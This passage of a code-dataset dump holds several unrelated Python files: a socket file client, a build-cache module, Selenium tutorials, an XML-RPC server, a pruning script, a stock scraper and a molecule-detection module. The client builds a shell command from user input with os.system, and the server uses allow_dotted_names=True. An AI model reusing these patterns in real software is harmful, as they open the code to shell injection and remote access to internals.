'\n    print(output)","sub_path":"oj/2C.py","file_name":"2C.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"270872598","text":"import socket\nimport os\nfrom archivos_x_socket import archivo\n\nHOST = '192.168.43.247'\nPORT = 8001\nBUFFER = 1024\n\ndef menu():\n    os.system(\"clear\")\n    print(\"\"\"\n    1) Crear un Nuevo archivo\n    2) Eliminar archivo\n    3) Actualizar archivo\n    4) Mostrar Contenido de un archivo\n    \"\"\")\n\ndef listar_archivos():\n    print(\"\\t Archivo en este directorio\")\n    directorio = os.listdir(\"./\")\n    for archivo in directorio:\n        print(f\"\\t>>{archivo}\")\n    \n\ndef avisar(accion,conexion,nombre_archivo):\n    listar_archivos()\n    '''\n    acciones:\n    1:agregar archivo\n    2:eliminar archivo\n    3:actualizar archivo\n    4:mostrar contenido de un archivo \n    '''\n    if accion == 1:\n        conexion.send(bytes('nuevo','utf-8'))\n        respuesta = conexion.recv(BUFFER).decode('utf-8')\n        if str(respuesta) == 'ok':\n            if archivo.nuevo_archivo(nombre_archivo):\n                print(f\"Archivo:{nombre_archivo} creado exitosamente\")\n                print(\"enviando archivo...\")\n                archivo.mandar_archivo(conexion,nombre_archivo)\n\n    elif accion == 2:\n        conexion.send(bytes('eliminar','utf-8'))\n        respuesta = conexion.recv(BUFFER).decode('utf-8')\n        if str(respuesta) =='ok':\n            conexion.send(bytes(nombre_archivo,'utf-8'))\n            if archivo.eliminar_archivo(nombre_archivo):\n                print(f\"Archivo:{nombre_archivo} ha sido eliminado\")\n            else:\n                print(f\"no se puede eliminar el archivo:{nombre_archivo}\")\n\n    elif accion == 3:\n        conexion.send(bytes('actualizar','utf-8'))\n        respuesta = conexion.recv(BUFFER).decode('utf-8')\n        if str(respuesta) == 'ok':\n            if archivo.actualizar_archivo(nombre_archivo):\n                print(f\"Archivo:{nombre_archivo} ha sido eliminado\")\n                archivo.mandar_archivo(conexion,nombre_archivo,\"actualizar\")\n            else:\n                print(f\"no se puede actualizar el archivo:{nombre_archivo}\")\n\n    elif accion == 4:\n        ruta = './' + nombre_archivo\n        if not \".txt\" in nombre_archivo:\n            ruta += '.txt'\n        if os.path.isfile(ruta):\n            os.system(f\"cat {nombre_archivo}\") \n            input(\"Oprima Enter para continuar...\")\n        else:\n            print(f\"el archivo{nombre_archivo} no existe\")\n            input(\"Oprima Enter para continuar...\")\n\n\nwith socket.socket(socket.AF_INET,socket.SOCK_STREAM) as servidor:\n    servidor.connect((HOST,PORT))\n    while True:\n        menu()\n        accion = int(input(\"Ingresa la acción que se quiere Realizar:\"))\n        listar_archivos()\n        nombre_archivo = input(\"Ingrese el nombre del archivo a crear/eliminar/actualizar: \")\n        avisar(accion,servidor,nombre_archivo)\n    \n\n","sub_path":"Programacion concurrente/sockets/TCP/practica/maquina_cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"118949662","text":"import time\n\nfrom buildapi.model.builds import getBuildsQuery, requestFromRow, buildFromRow, \\\n    getRevision, getPendingQuery\nfrom buildapi.lib.times import dt2ts, ts2dt, oneday, now\n\nimport logging\nlog = logging.getLogger(__name__)\n\ndef getBuilds(branch, starttime, endtime):\n    log.info(\"Getting builds on %s between %s and %s\", branch, starttime,\n             endtime)\n    build_q = getBuildsQuery(branch, starttime, endtime)\n\n    # Elements with the same claimed_by_name, claimed_by_incarnation,\n    # claimed_at, buildername, and number are actually the same build and\n    # should only be represented once\n    builds = {}\n    retval = []\n    for build in build_q.execute():\n        key = (build.claimed_by_name, build.claimed_by_incarnation,\n               build.claimed_at, build.buildername, build.number)\n        if key in builds:\n            request = requestFromRow(build)\n            builds[key]['requests'].append(request)\n        else:\n            builds[key] = buildFromRow(build)\n            retval.append(builds[key])\n\n    q = getPendingQuery(branch, starttime, endtime)\n    for req in q.execute():\n        retval.append(requestFromRow(req))\n\n    return retval\n\nclass BuildapiCache:\n    def __init__(self, cache, timezone):\n        self.cache = cache\n        self.timezone = timezone\n\n    def build_key_for_day(self, date, branch):\n        assert date.tzinfo\n        return \"builds:%s:%s\" % (branch, date.strftime('%Y-%m-%d'))\n\n    def build_key_for_rev(self, branch, rev):\n        return \"builds:%s:%s\" % (branch, rev)\n\n    def get_builds_for_revision(self, branch, revision):\n        revision = revision[:12]\n        key = self.build_key_for_rev(branch, revision)\n        return self.cache.get(key, getRevision, (branch, revision),\n                              expire=time.time()+120)\n\n    def get_builds_for_day(self, date, branch):\n        \"\"\"\n        Returns a list of builds for the given date (a datetime.datetime instance)\n        \"\"\"\n        assert date.tzinfo\n        key = self.build_key_for_day(date, branch)\n        starttime = dt2ts(date)\n        endtime = dt2ts(date + oneday)\n\n        if date - now(self.timezone) < 3*oneday:\n            # Expire soon\n            expire = time.time() + 60\n        else:\n            # Don't expire\n            expire = 0\n\n        return self.cache.get(key, getBuilds, (branch, starttime, endtime),\n                              expire=expire)\n\n    def get_builds_for_date_range(self, starttime, endtime, branch, method=0):\n        \"\"\"\n        Returns a list of builds for the given date range. starttime and\n        endtime should be datetime.datetime instances.\n        \"\"\"\n        assert starttime.tzinfo\n        assert endtime.tzinfo\n\n        # Naive version: grab every day individually\n        if method == 0:\n            retval = []\n            d = starttime\n            while d < endtime:\n                builds = self.get_builds_for_day(d, branch)\n                retval.extend(builds)\n                d += oneday\n            return retval\n\n        # Less naive version?
grab the entire date range if anything isn't\n # cached\n if method == 1:\n d = starttime\n need_more = False\n while d < endtime:\n key = self.build_key_for_day(d, branch)\n if not self.cache.has_key(key):\n need_more = True\n break\n d += oneday\n\n if not need_more:\n # Fall back to method 0\n return self.get_builds_for_date_range(starttime, endtime,\n branch, method=0)\n\n # Do a big query to get everything\n builds = getBuilds(branch,\n dt2ts(starttime),\n dt2ts(endtime),\n )\n retval = builds\n\n # And then cache the results by date\n days = {}\n for b in builds:\n date = ts2dt(b['starttime'], self.timezone)\n date = date.replace(hour=0, minute=0, second=0, microsecond=0)\n\n days.setdefault(date, []).append(b)\n\n for date, builds in days.iteritems():\n if date - now(self.timezone) < 3*oneday:\n # Expire soon\n expire = time.time() + 60\n else:\n # Expire in half an hour\n expire = time.time() + 1800\n key = self.build_key_for_day(date, branch)\n self.cache.put(key, builds, expire=expire)\n\n return retval\n\n","sub_path":"buildapi/lib/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105071833","text":"\nfrom selenium import webdriver\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\n# dr.find_element_by_xpath('//input[@id=\"kw\"]').send_keys('jarthong')\n\n# 爷爷标签定位\n# dr.find_element_by_xpath('//form[@id=\"form\"]/span/input').send_keys('jarthong')\n\n# # 逻辑运算符(加强元素唯一性)\n# dr.find_element_by_xpath('//input[@id=\"kw\" and @autocomplete=\"off\"]').send_keys('jarthong')\n# dr.find_element_by_xpath('//input[@value=\"百度一下\"]').click()\n# # dr.quit()\n\n# css\n# dr.find_element_by_css_selector('form#form>span>input.s_ipt').send_keys('jarthong')\n\n# is_displayer() 查看元素是否可见\n# m = dr.find_element_by_id('kw').is_displayed()\n# print(m)\n\n\n# 显示等待\nfrom selenium import webdriver\n# 显示等待需要导入下面三个方法(类),\nfrom selenium.webdriver.support import expected_conditions as EC # 判断元素是否出现的类\nfrom selenium.webdriver.support.ui import WebDriverWait # 显示等待需要结合WebDriverWait这个类使用\nfrom selenium.webdriver.common.by import By # 元素定位的另外一种写法\n\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\n# WebDriverWait这个类需要传三个参数,第一个参数是浏览器驱动,第二个参数是整个判断的总时长,第三个是代表多久判断一次(单位是秒)\nWebDriverWait(dr,5,0.5).until(EC.presence_of_element_located((By.ID,\"kw\"))).send_keys('jathong')\n\n\n\n# By类使用方法\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys # 键盘事件\nfrom time import sleep\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\ndr.maximize_window() # 窗口最大化\ndr.find_element(By.ID,'kw').send_keys('jarthong') # 定位到百度输入框,输入内容\ndr.find_element(By.CSS_SELECTOR,'[value=\"百度一下\"]').click() # 点击“百度一下”\n\nsleep(3)\ndr.find_element(By.ID,'kw').send_keys(Keys.BACK_SPACE)\nsleep(3)\ndr.find_element(By.ID,'kw').send_keys('hong')\nsleep(3)\ndr.find_element(By.CSS_SELECTOR,'[value=\"百度一下\"]').send_keys(Keys.ENTER)\n\nsleep(3)\n# 调用javascript方法来执行滚动条\n# 以下这条命令,除了把纵向滚动条从上往下拉之外,也同时会把横向滚动条从右往左拉,若横向本身就在左边,则不动\ndr.execute_script('window.scrollTo(0,2500)') # 纵向拉动滚动条,从上往下拉\nsleep(3)\n# dr.execute_script('window.scrollTo(2500,0)') # 从下往上拉\n# 定位一组元素,通过数组下标来确定第几个元素\ndr.find_elements(By.CLASS_NAME,'pc')[1].click()\nsleep(3)\n# 设置窗口大小,为了调出横向滚动条\ndr.set_window_size(600,480)\nsleep(3)\ndr.execute_script('window.scrollTo(0,800)')\nsleep(3)\n# 这条命令,除了把横���滚动条从左往右拉之外,也同时会把纵向滚动条从下往上拉\ndr.execute_script('window.scrollTo(2500,0)')\n\n\n\n# 
鼠标悬停\nfrom selenium import webdriver\n# 导入ActionChains鼠标悬停模块\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom time import sleep\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\nsleep(2)\n# 先获取要悬停的元素\n# 注意:百度登录账号状态和未登录账号,元素属性不一样\nname = dr.find_element_by_link_text('设置')\n# ActionChains需要传入驱动参数...移动到要悬停的元素...执行操作\nActionChains(dr).move_to_element(name).perform()\nsleep(3)\ndr.find_element_by_link_text('高级搜索').click()\n\n\n\nfrom selenium import webdriver\nfrom time import sleep\ndr = webdriver.Chrome()\ndr.get('https://www.baidu.com/')\ndr.find_element_by_id('kw').send_keys('渗透吧')\ndr.find_element_by_id('su').click()\nsleep(3)\ndr.find_element_by_xpath('//*[@id=\"1\"]/h3/a').click() # 点击搜索出来的第一个贴吧\nprint(dr.window_handles) # 打印看一下句柄,(实际操作时省去),以数组的形式存在\nsleep(3)\n# 切换到第二个窗口(即新打开的窗口),第二个页面的句柄dr.window_handles[1]\ndr.switch_to.window(dr.window_handles[1])\n# 点击第一个帖子\ndr.find_element_by_xpath('//*[@id=\"thread_top_list\"]/li[1]/div/div[2]/div/div[1]/a').click()\nsleep(3)\n# 切换到第三个窗口,(即帖子打开的窗口)\ndr.switch_to.window(dr.window_handles[2])\n# 返回第一个窗口\ndr.switch_to.window(dr.window_handles[0])\ndr.find_element_by_id('kw').clear() # 清空输入框\nsleep(2)\ndr.find_element_by_id('kw').send_keys('jarthong')\nsleep(2)\ndr.find_element_by_id('su').click() # 点击‘百度一下’\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python_selenium/selenium_test.py","file_name":"selenium_test.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"580219419","text":"import os\nimport argparse\n\nimport yaml\nimport logging.config\nfrom parlai.agents.programr.config.brain.brain import BrainConfiguration\nfrom parlai.agents.programr.config.programrconfig import ProgramrConfiguration\nfrom xmlrpc.server import SimpleXMLRPCServer\nfrom parlai.agents.programr.utils.classes.loader import ClassLoader\nfrom parlai.agents.programr.utils.logging.ylogger import YLogger\nfrom parlai.agents.programr.services.all_services import AllServices\nfrom parlai.agents.programr.config.xmlrpcserver.config import XMLRPCConfiguration\n\n\nclass XMLRPCServer:\n\n def __init__(self):\n self.parse_arguments()\n self.load_configuration()\n #self.initiate_logging()\n xmlrpc = XMLRPCConfiguration()\n print(xmlrpc.host)\n print(xmlrpc.port)\n self.server = SimpleXMLRPCServer((xmlrpc.host,\n xmlrpc.port),\n logRequests=True)\n\n self.services_config = self.configuration.bot.brain.services\n self.nlp_config = self.configuration.bot.brain.nlp\n self.register_functions()\n\n def get_server_configuration(self):\n return BrainConfiguration(\"brain\")\n\n\n def parse_arguments(self):\n client_args = argparse.ArgumentParser()\n client_args.add_argument(\"--config\", type=str, action='store')\n client_args.add_argument(\"--cformat\", type=str, action='store')\n #client_args.add_argument(\"logging\", type=str)\n self.arguments = client_args.parse_args()\n\n def get_description(self):\n return 'ProgramR XML RPC Server'\n\n def add_client_arguments(self, parser=None):\n # Nothing to add\n return\n\n def parse_args(self, arguments, parsed_args):\n # Nothing to add\n return\n\n def load_configuration(self):\n config_filename = self.arguments.config\n config_format = self.arguments.cformat\n\n if config_filename is not None:\n self._configuration = ProgramrConfiguration.from_file(config_filename,\n config_format,\n )\n else:\n raise Exception(\"No configuration file specified\")\n\n @property\n def configuration(self):\n return 
self._configuration\n\n\n def register_functions(self):\n loader = ClassLoader()\n YLogger.debug(self, \"Loading Services.\")\n for service_name in self.services_config:\n service_config = self.services_config[service_name]\n meta_class = loader.instantiate_class(service_config.classname)\n setattr(AllServices, service_name, meta_class)\n if service_config.is_native:\n setattr(AllServices, service_name.lower(), meta_class(self.nlp_config))\n else:\n setattr(AllServices, service_name.lower(), meta_class(service_config))\n\n self.server.register_instance(AllServices, allow_dotted_names=True)\n\n def initiate_logging(self, arguments):\n if arguments.logging is not None:\n with open(arguments.logging, 'r+', encoding=\"utf-8\") as yml_data_file:\n logging_config = yaml.load(yml_data_file, Loader=yaml.FullLoader)\n logging.config.dictConfig(logging_config)\n YLogger.info(self, \"Now logging under configuration\")\n else:\n print(\"Warning. No logging configuration file defined, using defaults...\")\n\n def run(self):\n try:\n print('Serving...')\n self.server.serve_forever()\n except KeyboardInterrupt:\n print(\"Exiting\")\n\n\nif __name__ == \"__main__\":\n server = XMLRPCServer()\n server.run()\n","sub_path":"parlai/agents/programr/rpcservices/xmlrpcserver.py","file_name":"xmlrpcserver.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"466446880","text":"import os\nimport torch\n\nlr = '0.1'\nsave = 'vgg16-cifar100_lf'\npr_list = [30, 50, 70]\nsnap_list = [9, 19, 29, 39, 49, 59, 69, 79, 89, 99, 109, 119, 129, 139, 149, 159]\nepochs_base = 160\nlr_drop_ep1 = 80\nlr_drop_ep2 = 120\n\ntorch.set_num_threads(6)\n\nbase_search = 'CUDA_VISIBLE_DEVICES=0 python main.py \\\n--dataset cifar100 \\\n--arch vgg \\\n--depth 16 \\\n--lr '+lr+' \\\n--epochs %d \\\n--schedule 80 120 \\\n--batch-size 256 \\\n--test-batch-size 256 \\\n--save ./baseline/'+save+' \\\n--momentum 0.9 \\\n--sparsity-regularization'\n\nbase_prune = 'CUDA_VISIBLE_DEVIDES=0 python vggprune.py \\\n--dataset cifar100 \\\n--test-batch-size 256 \\\n--depth 16 \\\n--percent 0.3 \\\n--model ./baseline/'+save+'/ckpt%d_%d.pth.tar \\\n--save ./baseline/'+save+'/prune%d_%d \\\n--gpu_ids 0'\n\nbase_retrain = 'CUDA_VISIBLE_DEVICES=0 python main_c.py \\\n--dataset cifar100 \\\n--arch vgg \\\n--depth 16 \\\n--lr '+lr+' \\\n--epochs %d \\\n--schedule %d %d \\\n--batch-size 256 \\\n--test-batch-size 128 \\\n--save ./baseline/'+save+'/retrain%d_%d_'+lr+' \\\n--momentum 0.9 \\\n--sparsity-regularization \\\n--scratch ./baseline/'+save+'/prune%d_%d/pruned.pth.tar \\\n--start-epoch %d'\n\nbase_eb_prune = 'CUDA_VISIBLE_DEVIDES=0 python vggprune.py \\\n--dataset cifar100 \\\n--test-batch-size 256 \\\n--depth 16 \\\n--percent 0.3 \\\n--model ./baseline/'+save+'/EB_%d_%d.pth.tar \\\n--save ./baseline/'+save+'/EB_prune%d_%d \\\n--gpu_ids 0'\n\nbase_eb_retrain = 'CUDA_VISIBLE_DEVICES=0 python main_c.py \\\n--dataset cifar100 \\\n--arch vgg \\\n--depth 16 \\\n--lr '+lr+' \\\n--epochs %d \\\n--schedule %d %d \\\n--batch-size 256 \\\n--test-batch-size 128 \\\n--save ./baseline/'+save+'/EB_retrain%d_%d_'+lr+' \\\n--momentum 0.9 \\\n--sparsity-regularization \\\n--scratch ./baseline/'+save+'/EB_prune%d_%d/pruned.pth.tar \\\n--start-epoch %d'\n\nprint('SEARCHING')\nos.system(base_search % epochs_base)\nfor pr in pr_list:\n for snap in snap_list:\n print('PRUNING PR %d AND SNAP %d' % (pr, snap))\n os.system(base_prune % (snap, pr, snap, pr))\n print('RETRAINING PR %d AND 
SNAP %d' % (pr, snap))\n os.system(base_retrain % (snap + epochs_base, lr_drop_ep1 + snap, lr_drop_ep2 + snap, snap, pr, snap, pr, snap))\n files = os.listdir('./baseline/'+save)\n b = []\n for file in files:\n if 'EB' in file and '_m.' not in file and file[3:5] == str(pr):\n b.append(file)\n if len(b) == 1:\n b = b[0]\n snap = int(b.split('_')[2][0:-8])\n print('PRUNING EB PR %d' % pr)\n os.system(base_eb_prune % (pr, snap, snap, pr))\n print('RETRAINING EB PR %d' % pr)\n os.system(base_eb_retrain % (snap + epochs_base, lr_drop_ep1 + snap, lr_drop_ep2 + snap, snap, pr, snap, pr, snap))","sub_path":"standard_train_auto.py","file_name":"standard_train_auto.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5742797","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import date\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nimport psycopg2\n\n\ndef initial_settings(log_dir='log', db_dir='data'):\n if log_dir not in os.listdir():\n os.mkdir(log_dir)\n if db_dir not in os.listdir():\n os.mkdir(db_dir)\n urls = dict(\n top = 'http://kabureal.net',\n pagelist = '/brandlist/?code={}',\n brandpage = '/brand/?code={}')\n return log_dir, db_dir, urls\n\n\ndef _get_brandlist(url):\n print('access {}'.format(url))\n html = urlopen(url)\n bsObj = BeautifulSoup(html, 'html.parser')\n num = int(bsObj.find('div', class_='mtop10 fs15').find('span').get_text())\n\n cnt = 0\n for brand in bsObj.findAll('div', class_='span4'):\n if ('href' not in brand.find('a').attrs or\n not brand.find('a')['href'].startswith('/brand/?code=')):\n continue\n b_id, b_name = brand.find('a').get_text().split(maxsplit=1)\n try:\n main_f, sub_f = brand.find('div').get_text().split(maxsplit=1)\n except ValueError:\n main_f , sub_f = '', brand.find('div').get_text().strip()\n cnt += 1\n yield b_id, b_name, main_f, sub_f\n\n assert cnt == num, '{} brands expected, but get {} from {}'.format(num, cnt, url)\n \n\ndef get_brandlist(db_dir, urls, max_page=18): # max 18 => 9500~9999\n for page_idx in [1000 + i * 500 for i in range(max_page)]:\n url = urls['top'] + urls['pagelist'].format(page_idx)\n for b_id, b_name, main_f, sub_f in _get_brandlist(url):\n with open(db_dir + '/brands.txt', 'a') as f:\n f.write('{}@{}@{}@{}\\n'.format(b_id, b_name, main_f, sub_f))\n\n\ndef read_brandlist(db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n for line in lines.split('\\n'):\n if line:\n b_id, b_name, main_f, sub_f = line.split('@')\n yield b_id, b_name, main_f, sub_f\n\n\ndef create_master_brands(db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n brands = [(line[0], line[1]) for line in lines]\n main_fields = sorted(list(set([line[2] for line in lines])))\n sub_fields = sorted(list(set([line[3] for line in lines])))\n main_fields = [elm if elm else 'undefined' for elm in main_fields]\n sub_fields = [elm if elm else 'undefined' for elm in sub_fields]\n template_b = \"INSERT INTO {} ({}, {}) VALUES ('{}', '{}');\\n\"\n template_f = \"INSERT INTO {} ({}, {}) VALUES ('{:0>3}', '{}');\\n\"\n with open(db_dir + '/brands_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for c, n in brands:\n f.write('-- {}:{}\\n'.format(c, n))\n f.write(template_b.format(\n 'Brands', 'code', 'name', c, n))\n f.write('COMMIT;\\n')\n with open(db_dir + '/markets_master.sql', 'w') as f:\n 
f.write('BEGIN TRANSACTION;\\n')\n for i, n in enumerate(main_fields):\n f.write('-- {:0>3}:{}\\n'.format(i, n))\n f.write(template_f.format(\n 'Markets', 'code', 'name', i, n))\n f.write('COMMIT;\\n')\n with open(db_dir + '/kinds_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for i, n in enumerate(sub_fields, 1):\n f.write('-- {:0>3}:{}\\n'.format(i, n))\n f.write(template_f.format(\n 'Kinds', 'code', 'name', i, n))\n f.write('COMMIT;\\n')\n\n\ndef _get_brandinfo(code, urls, db_dir):\n html = urlopen(urls['top'] + urls['brandpage'].format(code))\n bsObj = BeautifulSoup(html, 'html.parser')\n d = dict()\n for lst in bsObj.find('ul', class_='inline mbtm0 fs12 corp_info').findAll('li'):\n k, v = lst.get_text().split()\n d[k] = v\n today = date.today().isoformat()\n if '市場' not in d.keys():\n d['市場'] = 'undefined'\n with open(db_dir + '/attributes_data.txt', 'a') as f:\n f.write('{}@{}@{}@{}@{}\\n'.format(\n code, today, d['市場'], d['業種分類'], int(d['単元株数'][:-1].replace(',', ''))))\n\n\ndef get_attributes(urls, db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n codes = [line[0] for line in lines]\n for code in codes:\n print('access brand_id={}'.format(code))\n _get_brandinfo(code, urls, db_dir)\n\n\ndef get_field_table(db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n main_fields = sorted(list(set([line[2] for line in lines])))\n main_fields = [elm if elm else 'undefined' for elm in main_fields]\n sub_fields = sorted(list(set([line[3] for line in lines])))\n sub_fields = [elm if elm else 'undefined' for elm in sub_fields]\n mft, sft = dict(), dict()\n for i, n in enumerate(main_fields):\n mft[n] = '{:0>3}'.format(i)\n for i, n in enumerate(sub_fields, 1):\n sft[n] = '{:0>3}'.format(i)\n return mft, sft\n\n\ndef create_master_attributes(db_dir, mft, sft):\n with open(db_dir + '/attributes_data.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n template = \"INSERT INTO {} ({}, {}, {}, {}, {}) VALUES ('{}', '{}', '{}', '{}', {});\\n\"\n with open(db_dir + '/attributes_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for code, idate, market, kind, unit in lines:\n f.write(template.format('Attributes', 'code', 'issue_date', 'market', 'kind',\n 'unit', code, idate, mft[market], sft[kind], unit))\n f.write('COMMIT;\\n')\n\n \nif __name__ == '__main__':\n log_dir, db_dir, urls = initial_settings()\n \n if 'brands.txt' in os.listdir(db_dir):\n print('{} is already exists'.format(db_dir + '/brands.txt'))\n else:\n get_brandlist(db_dir, urls)\n\n if 'brands_master.sql' in os.listdir(db_dir):\n print('{} is already exists'.format('brand master sql'))\n else:\n create_master_brands(db_dir)\n\n if 'attributes_data.txt' in os.listdir(db_dir):\n print('{} is already exists'.format(db_dir + '/attributes_data.txt'))\n else:\n get_attributes(urls, db_dir)\n\n mft, sft = get_field_table(db_dir)\n\n if 'attributes_master.sql' in os.listdir(db_dir):\n print('{} is already exists'.format('attributes master sql'))\n create_master_attributes(db_dir, mft, sft)\n\n# url = 'http://k-db.com/stocks/2017-02-21'\n","sub_path":"initial_scraping_v2_1.py","file_name":"initial_scraping_v2_1.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"364971590","text":"\"\"\"Detect from trajectory.\"\"\"\nimport pickle\nfrom abc import ABCMeta, abstractmethod\nfrom enum import Enum, auto\nfrom collections import defaultdict\n\nimport openbabel\nimport numpy as np\nfrom ase import Atom, Atoms\nfrom scipy.spatial import cKDTree\nfrom .dps import dps as connectmolecule\n\n\nclass Detect(metaclass=ABCMeta):\n def __init__(self, filename, atomname, pbc, errorlimit=None, errorfilename=None):\n self.filename = filename\n self.atomname = atomname\n self.pbc = pbc\n self.errorlimit = errorlimit\n self.errorfilename = errorfilename\n self.steplinenum = self._readN()\n\n @abstractmethod\n def _readN(self):\n pass\n\n @abstractmethod\n def readatombondtype(self, item):\n \"\"\"This function reads bond types of atoms such as C1111.\"\"\"\n pass\n\n @abstractmethod\n def readmolecule(self, lines):\n \"\"\"This function reads molecules.\"\"\"\n pass\n\n @staticmethod\n def gettype(inputtype):\n \"\"\"Get the class for the input file type.\"\"\"\n if inputtype == 'bond':\n detectclass = DetectBond\n elif inputtype == 'dump':\n detectclass = DetectDump\n else:\n raise RuntimeError(\"Wrong input file type\")\n return detectclass\n\n\nclass DetectBond(Detect):\n \"\"\"LAMMPS bond file.\"\"\"\n\n def _readN(self):\n \"\"\"Read bondfile N, which should be at very beginning.\"\"\"\n # copy from reacnetgenerator on 2018-12-15\n with open(self.filename if isinstance(self.filename, str) else self.filename[0]) as f:\n iscompleted = False\n for index, line in enumerate(f):\n if line.startswith(\"#\"):\n if line.startswith(\"# Number of particles\"):\n if iscompleted:\n stepbindex = index\n break\n else:\n iscompleted = True\n stepaindex = index\n N = [int(s) for s in line.split() if s.isdigit()][0]\n atomtype = np.zeros(N, dtype=np.int)\n else:\n s = line.split()\n atomtype[int(s[0])-1] = int(s[1])\n steplinenum = stepbindex-stepaindex\n self._N = N\n self.atomtype = atomtype\n self.atomnames = self.atomname[self.atomtype-1]\n return steplinenum\n\n def readatombondtype(self, item):\n # copy from reacnetgenerator on 2018-12-15\n (step, lines), _ = item\n d = defaultdict(list)\n for line in lines:\n if line:\n if line[0] != \"#\":\n s = line.split()\n atombond = sorted(\n map(lambda x: max(1, round(float(x))), s[4 + int(s[2]): 4 + 2 * int(s[2])]))\n d[pickle.dumps((self.atomnames[int(s[0]) - 1],\n atombond))].append(int(s[0]))\n return d, step\n\n def readmolecule(self, lines):\n # copy from reacnetgenerator on 2018-12-15\n bond = [None]*self._N\n for line in lines:\n if line:\n if not line.startswith(\"#\"):\n s = line.split()\n bond[int(s[0])-1] = map(lambda x: int(x) -\n 1, s[3:3+int(s[2])])\n molecules = connectmolecule(bond)\n return molecules\n\n\nclass DetectDump(Detect):\n def _readN(self):\n # copy from reacnetgenerator on 2018-12-15\n iscompleted = False\n with open(self.filename if isinstance(self.filename, str) else self.filename[0]) as f:\n for index, line in enumerate(f):\n if line.startswith(\"ITEM:\"):\n linecontent = self.LineType.linecontent(line)\n else:\n if linecontent == self.LineType.NUMBER:\n if iscompleted:\n stepbindex = index\n break\n else:\n iscompleted = True\n stepaindex = index\n N = int(line.split()[0])\n atomtype = np.zeros(N, dtype=int)\n elif linecontent == self.LineType.ATOMS:\n s = line.split()\n atomtype[int(s[0])-1] = int(s[1])\n steplinenum = stepbindex-stepaindex\n self._N = N\n self.atomtype = atomtype\n self.atomnames = self.atomname[self.atomtype-1]\n return steplinenum\n\n def readatombondtype(self, 
item):\n (step, lines), needlerror = item\n if needlerror:\n trajline, errorline = lines\n item = (step, trajline), None\n lerror = np.fromstring(errorline, dtype=float, sep=' ')[7:]\n d = defaultdict(list)\n step_atoms, ids = self.readcrd(item)\n if needlerror:\n lerror = [x for (y, x) in sorted(zip(ids, lerror))]\n level = self._crd2bond(step_atoms, readlevel=True)\n for i, (n, l) in enumerate(zip(self.atomnames, level)):\n if not needlerror or lerror[i] > self.errorlimit:\n # Note that atom id starts from 1\n d[pickle.dumps((n, sorted(l)))].append(i+1)\n return d, step\n\n def readmolecule(self, lines):\n bond = [None]*self._N\n step_atoms, _ = self.readcrd(((None, lines), None))\n bond = self._crd2bond(step_atoms, readlevel=False)\n molecules = connectmolecule(bond)\n # return atoms as well\n return molecules, step_atoms\n\n @classmethod\n def _crd2bond(cls, step_atoms, readlevel):\n # copy from reacnetgenerator on 2019/4/13\n atomnumber = len(step_atoms)\n if step_atoms.pbc.any():\n # Apply periodic boundary conditions\n # add ghost atoms\n repeated_atoms = step_atoms.repeat(2)[atomnumber:]\n tree = cKDTree(step_atoms.get_positions())\n d = tree.query(repeated_atoms.get_positions(), k=1)[0]\n nearest = d < 5\n ghost_atoms = repeated_atoms[nearest]\n realnumber = np.where(nearest)[0] % atomnumber\n step_atoms += ghost_atoms\n xyzstring = ''.join((f\"{atomnumber}\\n{__name__}\\n\", \"\\n\".join(\n [f'{s:2s} {x:22.15f} {y:22.15f} {z:22.15f}'\n for s, (x, y, z) in zip(\n step_atoms.get_chemical_symbols(),\n step_atoms.positions)])))\n conv = openbabel.OBConversion()\n conv.SetInAndOutFormats('xyz', 'mol2')\n mol = openbabel.OBMol()\n conv.ReadString(mol, xyzstring)\n mol2string = conv.WriteString(mol)\n linecontent = -1\n if readlevel:\n bondlevel = [[] for i in range(atomnumber)]\n else:\n bond = [[] for i in range(atomnumber)]\n for line in mol2string.split('\\n'):\n if line.startswith(\"@BOND\"):\n linecontent = 0\n else:\n if linecontent == 0:\n s = line.split()\n if len(s) > 3:\n s1, s2 = int(s[1])-1, int(s[2])-1\n if s1 >= atomnumber and s2 >= atomnumber:\n # duplicated\n continue\n elif s1 >= atomnumber:\n s1 = realnumber[s1-atomnumber]\n elif s2 >= atomnumber:\n s2 = realnumber[s2-atomnumber]\n if readlevel:\n level = 9 if s[3] == 'ar' else int(s[3])\n 